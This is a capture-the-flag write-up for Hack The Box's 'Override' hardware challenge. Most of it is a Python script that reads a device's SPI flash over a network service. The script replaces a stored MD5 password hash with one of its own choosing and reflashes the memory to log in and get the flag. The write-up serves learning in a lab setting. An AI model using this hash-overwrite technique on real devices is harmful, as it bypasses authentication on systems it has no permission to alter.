Post

HackTheBox Override Writeup

Posted
By x3ric
2 min read

Explore the basics of cybersecurity in the Override Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83

import socket
import json
import hashlib
import sys

WRITE_ENABLE = 0x06
SECTOR_ERASE = 0x20
PAGE_PROGRAM = 0x02
PAGE_SIZE = 256

def new_pass(secret_value):
    hash_object = hashlib.md5()
    hash_object.update(secret_value.encode())
    return list(hash_object.digest())

def write_pages(pages):
    for page_no, data in enumerate(pages):
        address = [0x00, page_no, 0x00]
        packet = [PAGE_PROGRAM] + address + data
        exchange([WRITE_ENABLE])
        exchange(packet)

def split_pages(original_list, chunk_size):
    return [original_list[i:i + chunk_size] for i in range(0, len(original_list), chunk_size)]

if len(sys.argv) != 2:
    print(f"Usage: {sys.argv[0]} <ip:port>")
    sys.exit(1)

host, port = sys.argv[1].split(':')

def exchange(hex_list, value=0):
    cs = 0
    usb_device_url = 'ftdi://ftdi:2232h/1'
    command_data = {
        "tool": "pyftdi",
        "cs_pin": cs,
        "url": usb_device_url,
        "data_out": [hex(x) for x in hex_list],
        "readlen": value
    }
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((host, int(port)))
        s.sendall(json.dumps(command_data).encode('utf-8'))
        data = b''
        while True:
            data += s.recv(1024)
            if data.endswith(b']'):
                break
        response = json.loads(data.decode('utf-8'))
    return response

mem_data = exchange([0x03, 0x00, 0x00, 0x00], 4096)

from itertools import groupby
entries = [list(group) for k, group in groupby(mem_data, lambda x: x == 0) if not k]
target_entry = next((sublist for sublist in entries if len(sublist) == 16), None)

if target_entry:
    input_str = ' '.join(map(str, mem_data))
    target_str = ' '.join(map(str, target_entry))
    start_pos = input_str.find(target_str)
    index = input_str[:start_pos].count(' ')
else:
    index = None

print("Target sublist:", target_entry)
print("Start position in original hash:", index)

new_hash_list = new_pass('psw')
print('New hash:', new_hash_list)

part1 = mem_data[:index]
part2 = mem_data[index + 16:]
new_mem_data = part1 + new_hash_list + part2
new_mem_data = [x for x in new_mem_data if x != 255]

pages = split_pages(new_mem_data, PAGE_SIZE)
print(f'Program pages with new logs..')

exchange([WRITE_ENABLE])
exchange([SECTOR_ERASE, 0x00, 0x00, 0x00])
write_pages(pages)

Connect to the other port using the nc (netcat) and enter the password (psw). The flag will be displayed once the password is entered.

Summary

The Override Challenge on Hack The Box is a medium-level challenge focused on encryption reversal and file handling. It involves modifying memory data to change the password, using a Python script to update the device. After connecting to the other port via nc (netcat) and entering the new password (psw), the flag is revealed.

challenge
htb challenge writeup linux hardware
This post is licensed under CC BY 4.0 by the author.